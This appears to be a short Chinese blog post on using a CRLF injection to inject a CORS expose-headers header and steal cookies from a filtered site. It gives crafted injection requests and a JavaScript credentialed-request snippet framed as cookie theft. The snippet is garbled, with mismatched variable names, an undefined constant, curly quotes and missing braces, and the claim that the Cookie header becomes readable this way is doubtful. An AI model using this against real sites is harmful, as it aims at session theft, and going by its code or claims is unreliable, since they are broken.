CRLF在过滤XSS语句后打Cookie方式

piaomiaohongchen

     看了很长时间的漏洞奖励计划,学到了不少骚姿势,我觉得这个姿势很不错,总结下写篇文章发出来。针对CRLF漏洞打cookie的方法。

     这里不讲概念挖掘方式了,以实战为主:

          阅读文章前先参考文章:http://www.ruanyifeng.com/blog/2016/04/cors.html

          这篇文章对CORS跨域写的的很好,让我的思路清晰了很多,看完这篇文章下面的所谓骚姿势就一点都不骚了哈哈

        利用:

          目标网站:http://xxx.com/

            请求:

              GET /a?test=b HTTP/1.1

              Host: xxx.com

 

            响应:

            HTTP/1.1 200 OK

            test=b

  感觉可能存在crlf有戏,直接打cookie试试,这里网站过滤了xss语句,<>都被过滤:

      

          偷cookie:

            GET /a?Access-Control-Expose-Header%0d%0as=Cookie

            Host: xxx.com

          响应:

            HTTP/1.1 200 OK

            Access-Control-Expose-Headers: Cookie

          写段脚本,发起异步请求:

      

      

var requesta = new XMLHttpRequest();
var url=”http://xxx.com/a?Access-Control-Expose-Header%0d%0as=Cookie”
request.onreadystatechange = function () { 
if(requesta .readyState == getcookie.DONE) {//getcookie.DONE==4
document.write(requesta. getResponseHeader("Cookie"));
requesta .open('GET', url, true); 
requesta .withCredentials = true;
requesta .send();

发包即可。然后页面会显示cookie。

 

      


        

相关文章:

  • 2021-08-18
  • 2022-01-19
  • 2022-01-16
  • 2021-06-29
  • 2021-06-23
  • 2021-12-04
  • 2021-10-16
猜你喜欢
  • 2021-08-10
  • 2021-06-26
  • 2021-04-22
  • 2021-12-09
  • 2021-05-15
  • 2021-12-16
  • 2021-12-26
  • 2021-10-01
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode